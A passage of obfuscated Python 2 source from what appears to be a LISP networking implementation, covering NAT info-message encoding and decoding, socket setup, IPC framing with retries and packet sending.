if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
IiiiII = socket . htons ( LISP_AFI_LCAF )
OOOoooO000O0 = LISP_LCAF_NAT_TYPE
iII = socket . htons ( 16 )
I1IO0oo0oo00OO = socket . htons ( self . ms_port )
iIiI = socket . htons ( self . etr_port )
IiiiIi1iiii11 += struct . pack ( "HHBBHHHH" , IiiiII , 0 , OOOoooO000O0 , 0 , iII ,
I1IO0oo0oo00OO , iIiI , socket . htons ( self . global_etr_rloc . afi ) )
IiiiIi1iiii11 += self . global_etr_rloc . pack_address ( )
IiiiIi1iiii11 += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
IiiiIi1iiii11 += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : IiiiIi1iiii11 += struct . pack ( "H" , 0 )
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
if 73 - 73: I11i / I1IiiI - IiII - i1IIi * IiII - OOooOOo
for iIi in self . rtr_list :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( iIi . afi ) )
IiiiIi1iiii11 += iIi . pack_address ( )
if 39 - 39: I11i . ooOoO0o * II111iiii
return ( IiiiIi1iiii11 )
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
def decode ( self , packet ) :
oO0ooOoOooO00o00 = packet
O0O00Oo = "I"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
i1OOoO0OO0oO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
i1OOoO0OO0oO = i1OOoO0OO0oO [ 0 ]
packet = packet [ IiIii1i : : ]
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
O0O00Oo = "Q"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 45 - 45: II111iiii
o0OOO = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
i1OOoO0OO0oO = socket . ntohl ( i1OOoO0OO0oO )
self . nonce = o0OOO [ 0 ]
self . info_reply = i1OOoO0OO0oO & 0x08000000
self . hostname = None
packet = packet [ IiIii1i : : ]
if 84 - 84: o0oOOo0O0Ooo
if 40 - 40: OoooooooOO - oO0o / O0 * I1Ii111 . O0 + i11iIiiIii
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
if 66 - 66: OOooOOo * Oo0Ooo
O0O00Oo = "HH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
o00oO , Ooo = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if ( Ooo != 0 ) : return ( None )
if 3 - 3: iIii1I11I1II1 / oO0o
packet = packet [ IiIii1i : : ]
O0O00Oo = "IBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 61 - 61: I1Ii111 / O0 - iII111i
Oo0o0 , iI111iiI1II , iiIi , oO0O = struct . unpack ( O0O00Oo ,
packet [ : IiIii1i ] )
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if ( oO0O != 0 ) : return ( None )
packet = packet [ IiIii1i : : ]
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if ( self . info_reply == False ) :
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) >= IiIii1i ) :
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
if ( socket . ntohs ( IiiiII ) == LISP_AFI_NAME ) :
packet = packet [ IiIii1i : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
return ( oO0ooOoOooO00o00 )
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
O0O00Oo = "HHBBHHH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 74 - 74: i1IIi
IiiiII , oOo0oo , OOOoooO000O0 , iI111iiI1II , iII , I1IO0oo0oo00OO , iIiI = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
if ( socket . ntohs ( IiiiII ) != LISP_AFI_LCAF ) : return ( None )
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
self . ms_port = socket . ntohs ( I1IO0oo0oo00OO )
self . etr_port = socket . ntohs ( iIiI )
packet = packet [ IiIii1i : : ]
if 35 - 35: i11iIiiIii + oO0o
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( IiiiII != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( IiiiII )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
if 36 - 36: oO0o . iII111i
if ( len ( packet ) < IiIii1i ) : return ( oO0ooOoOooO00o00 )
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( IiiiII != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( IiiiII )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( oO0ooOoOooO00o00 )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if ( len ( packet ) < IiIii1i ) : return ( oO0ooOoOooO00o00 )
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( IiiiII != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( IiiiII )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( oO0ooOoOooO00o00 )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 85 - 85: OoooooooOO * ooOoO0o
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
while ( len ( packet ) >= IiIii1i ) :
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
packet = packet [ IiIii1i : : ]
if ( IiiiII == 0 ) : continue
iIi = lisp_address ( socket . ntohs ( IiiiII ) , "" , 0 , 0 )
packet = iIi . unpack_address ( packet )
if ( packet == None ) : return ( oO0ooOoOooO00o00 )
iIi . mask_len = iIi . host_mask_len ( )
self . rtr_list . append ( iIi )
if 62 - 62: I1Ii111 % II111iiii
return ( oO0ooOoOooO00o00 )
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
if 85 - 85: I11i % IiII
class lisp_nat_info ( ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
def timed_out ( self ) :
Ooo0o0oo0 = time . time ( ) - self . uptime
return ( Ooo0o0oo0 >= ( LISP_INFO_INTERVAL * 2 ) )
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
if 93 - 93: Ii1I / iII111i
class lisp_info_source ( ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
def cache_address_for_info_source ( self ) :
o0Oo = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ o0Oo ] = self
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 100 - 100: OOooOOo . ooOoO0o + I1Ii111 . oO0o
if 20 - 20: i11iIiiIii - i1IIi - iIii1I11I1II1 - OoooooooOO
if 72 - 72: I1Ii111 . OoO0O00
if 59 - 59: I1IiiI * I11i % i1IIi
if 77 - 77: OOooOOo * OoooooooOO + I1IiiI + I1IiiI % oO0o . OoooooooOO
if 60 - 60: iIii1I11I1II1
if 13 - 13: II111iiii + Ii1I
if 33 - 33: i1IIi
if 36 - 36: ooOoO0o % ooOoO0o . i11iIiiIii
if 42 - 42: OoO0O00 . I1Ii111 / Ii1I
if 57 - 57: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / oO0o . OoOoOO00
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 74 - 74: I1IiiI * OoO0O00 + OoooooooOO * ooOoO0o . oO0o
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if 81 - 81: i1IIi % iIii1I11I1II1
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
Iiii = auth1 + auth2 + auth3
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
Iiii = auth1 + auth2 + auth3 + auth4
if 82 - 82: ooOoO0o
return ( Iiii )
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
if 11 - 11: oO0o . i11iIiiIii * ooOoO0o % OoooooooOO % O0
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
if 19 - 19: oO0o
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
if 8 - 8: I1ii11iIi11i + II111iiii . OoO0O00 + I1IiiI - II111iiii % OoO0O00
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
ooO0ooO00o = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 47 - 47: II111iiii + I1Ii111 + II111iiii
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
ooO0ooO00o = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 45 - 45: II111iiii % OoOoOO00 / O0 % iIii1I11I1II1 + oO0o
ooO0ooO00o . bind ( ( local_addr , int ( port ) ) )
else :
II1 = port
if ( os . path . exists ( II1 ) ) :
os . system ( "rm " + II1 )
time . sleep ( 1 )
if 51 - 51: o0oOOo0O0Ooo * o0oOOo0O0Ooo . Ii1I
ooO0ooO00o = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
ooO0ooO00o . bind ( II1 )
if 14 - 14: OoO0O00 . I11i % II111iiii % i11iIiiIii + OoooooooOO
return ( ooO0ooO00o )
if 50 - 50: i11iIiiIii * I11i + i11iIiiIii - i1IIi
if 69 - 69: I1IiiI + IiII + oO0o * I1ii11iIi11i . iIii1I11I1II1 / OoooooooOO
if 77 - 77: Oo0Ooo - ooOoO0o
if 68 - 68: Ii1I * O0
if 61 - 61: II111iiii - OoO0O00 . iIii1I11I1II1 * o0oOOo0O0Ooo . OoO0O00 % IiII
if 11 - 11: oO0o + I11i
if 6 - 6: i1IIi . o0oOOo0O0Ooo + OoO0O00 + OOooOOo + oO0o
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
ooO0ooO00o = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 30 - 30: O0
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
ooO0ooO00o = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 98 - 98: I1Ii111
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
ooO0ooO00o = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
ooO0ooO00o . bind ( internal_name )
if 58 - 58: OOooOOo
return ( ooO0ooO00o )
if 6 - 6: I1ii11iIi11i
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
if 18 - 18: ooOoO0o
if 18 - 18: I1Ii111 + OoOoOO00 % OOooOOo - IiII - i1IIi + I1ii11iIi11i
if 33 - 33: I11i * Ii1I / Oo0Ooo + oO0o % OOooOOo % OoooooooOO
if 29 - 29: Ii1I . II111iiii / I1Ii111
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
if 81 - 81: i11iIiiIii - II111iiii + I11i
if 52 - 52: II111iiii
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
if 45 - 45: I1Ii111 + oO0o - o0oOOo0O0Ooo - OoOoOO00 + I1IiiI / II111iiii
if 46 - 46: II111iiii . iIii1I11I1II1
if 62 - 62: I1ii11iIi11i % i1IIi % I1Ii111 * ooOoO0o % OOooOOo + I1IiiI
if 100 - 100: II111iiii - o0oOOo0O0Ooo * OoooooooOO . ooOoO0o / II111iiii / oO0o
def lisp_packet_ipc ( packet , source , sport ) :
return ( ( "packet@" + str ( len ( packet ) ) + "@" + source + "@" + str ( sport ) + "@" + packet ) )
if 43 - 43: iIii1I11I1II1 + ooOoO0o * iII111i + iIii1I11I1II1 . I1Ii111
if 87 - 87: I1Ii111
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
if 94 - 94: IiII
if 69 - 69: I1Ii111 . I1Ii111
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
return ( "control-packet@" + dest + "@" + str ( dport ) + "@" + packet )
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
if 8 - 8: iII111i % o0oOOo0O0Ooo
if 87 - 87: Ii1I % I11i / I1Ii111
if 21 - 21: OoO0O00 + Ii1I / I1Ii111
if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
if 38 - 38: i1IIi
def lisp_data_packet_ipc ( packet , source ) :
return ( "data-packet@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
def lisp_command_ipc ( packet , source ) :
return ( "command@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 68 - 68: iII111i / OOooOOo
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
def lisp_api_ipc ( source , data ) :
return ( "api@" + str ( len ( data ) ) + "@" + source + "@@" + data )
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
def lisp_ipc ( packet , send_socket , node ) :
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 12 - 12: OoooooooOO
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
IiII1iiI = 1500 if ( packet . find ( "control-packet" ) == - 1 ) else 9000
if 68 - 68: OoooooooOO . OoooooooOO % I1ii11iIi11i + i1IIi % OoooooooOO + Ii1I
oO0ooOoO = 0
oOOoO0O = len ( packet )
O0000oO = 0
I1iiI1ii1i = .001
while ( oOOoO0O > 0 ) :
O0IIiIi = min ( oOOoO0O , IiII1iiI )
O0OO0O = packet [ oO0ooOoO : O0IIiIi + oO0ooOoO ]
if 86 - 86: iII111i / i1IIi % Oo0Ooo
try :
send_socket . sendto ( O0OO0O , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( O0OO0O ) , len ( packet ) , node ) )
if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
O0000oO = 0
I1iiI1ii1i = .001
if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
except socket . error , iIIi1iI1I1IIi :
if ( O0000oO == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
if 14 - 14: OoOoOO00 / iIii1I11I1II1 . o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( O0OO0O ) , len ( packet ) , node , iIIi1iI1I1IIi ) )
if 92 - 92: OoO0O00 . i1IIi
if 22 - 22: Ii1I . I1IiiI
O0000oO += 1
time . sleep ( I1iiI1ii1i )
if 54 - 54: OOooOOo / I1ii11iIi11i % oO0o
lprint ( "Retrying after {} ms ..." . format ( I1iiI1ii1i * 1000 ) )
I1iiI1ii1i *= 2
continue
if 66 - 66: I11i + iII111i
if 50 - 50: IiII
oO0ooOoO += O0IIiIi
oOOoO0O -= O0IIiIi
if 33 - 33: OOooOOo % I1IiiI - I1IiiI / IiII
return
if 22 - 22: ooOoO0o * ooOoO0o % o0oOOo0O0Ooo * Ii1I . OoO0O00
if 55 - 55: OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if 37 - 37: Ii1I + o0oOOo0O0Ooo
if 74 - 74: Oo0Ooo / O0 + i1IIi . I1IiiI + OoO0O00 / Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / Ii1I . II111iiii
if 8 - 8: I11i - I11i % IiII
if 8 - 8: I1IiiI . IiII * O0 * o0oOOo0O0Ooo
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
oO0ooOoO = 0
Ooo00O0ooOo = ""
oOOoO0O = len ( packet ) * 2
while ( oO0ooOoO < oOOoO0O ) :
Ooo00O0ooOo += packet [ oO0ooOoO : oO0ooOoO + 8 ] + " "
oO0ooOoO += 8
oOOoO0O -= 4
if 17 - 17: I1IiiI . oO0o + Oo0Ooo + I11i / o0oOOo0O0Ooo
return ( Ooo00O0ooOo )
if 25 - 25: iII111i / iII111i % OoOoOO00 / ooOoO0o
if 81 - 81: OOooOOo * oO0o
if 32 - 32: Oo0Ooo * OoO0O00 + ooOoO0o . O0 * oO0o * iIii1I11I1II1
if 50 - 50: i1IIi
if 53 - 53: II111iiii + O0 . ooOoO0o * IiII + i1IIi
if 80 - 80: Ii1I + O0
if 59 - 59: i11iIiiIii - OoooooooOO % I11i . OoO0O00 - Oo0Ooo * o0oOOo0O0Ooo
def lisp_send ( lisp_sockets , dest , port , packet ) :
ii11iiIii1 = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 97 - 97: OOooOOo . OoOoOO00 / I11i - IiII - iIii1I11I1II1
if 82 - 82: II111iiii + OoO0O00 % iIii1I11I1II1 / O0
if 75 - 75: OOooOOo * OoO0O00 + OoooooooOO + i11iIiiIii . OoO0O00
if 94 - 94: I11i * ooOoO0o . I1IiiI / Ii1I - I1IiiI % OoooooooOO
if 32 - 32: OoO0O00
if 22 - 22: II111iiii . I11i
if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
if 94 - 94: OOooOOo / IiII
if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
if 22 - 22: OoOoOO00 - Oo0Ooo
if 41 - 41: iIii1I11I1II1 * I1Ii111 / OoO0O00
ii1i1II11II1i = dest . print_address_no_iid ( )
if ( ii1i1II11II1i . find ( "::ffff:" ) != - 1 and ii1i1II11II1i . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : ii11iiIii1 = lisp_sockets [ 0 ]
if ( ii11iiIii1 == None ) :
ii11iiIii1 = lisp_sockets [ 0 ]
ii1i1II11II1i = ii1i1II11II1i . split ( "::ffff:" ) [ - 1 ]
if 33 - 33: I11i + O0
if 9 - 9: I11i . iII111i * ooOoO0o * ooOoO0o
if 68 - 68: O0 - i11iIiiIii % iIii1I11I1II1 % ooOoO0o
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + ii1i1II11II1i , False ) , port ,
lisp_format_packet ( packet ) ) )
if 12 - 12: II111iiii + I11i
if 9 - 9: I1ii11iIi11i
if 51 - 51: I1ii11iIi11i
if 37 - 37: I1IiiI % I1Ii111
IIIII1i111I = ( LISP_RLOC_PROBE_TTL == 128 )
if ( IIIII1i111I ) :
OoO0OOo = struct . unpack ( "B" , packet [ 0 ] ) [ 0 ]
IIIII1i111I = ( OoO0OOo in [ 0x12 , 0x28 ] )
if ( IIIII1i111I ) : lisp_set_ttl ( ii11iiIii1 , LISP_RLOC_PROBE_TTL )
if 94 - 94: Ii1I
if 73 - 73: ooOoO0o . OoO0O00 % I1ii11iIi11i - oO0o
try : ii11iiIii1 . sendto ( packet , ( ii1i1II11II1i , port ) )
except socket . error , iIIi1iI1I1IIi :
lprint ( "socket.sendto() failed: {}" . format ( iIIi1iI1I1IIi ) )
if 67 - 67: o0oOOo0O0Ooo . I11i + i1IIi
if 100 - 100: Oo0Ooo - I1IiiI . OOooOOo % iIii1I11I1II1 . I11i
if 83 - 83: OoOoOO00 * iII111i
if 75 - 75: i11iIiiIii . o0oOOo0O0Ooo / oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
if ( IIIII1i111I ) : lisp_set_ttl ( ii11iiIii1 , 64 )
return
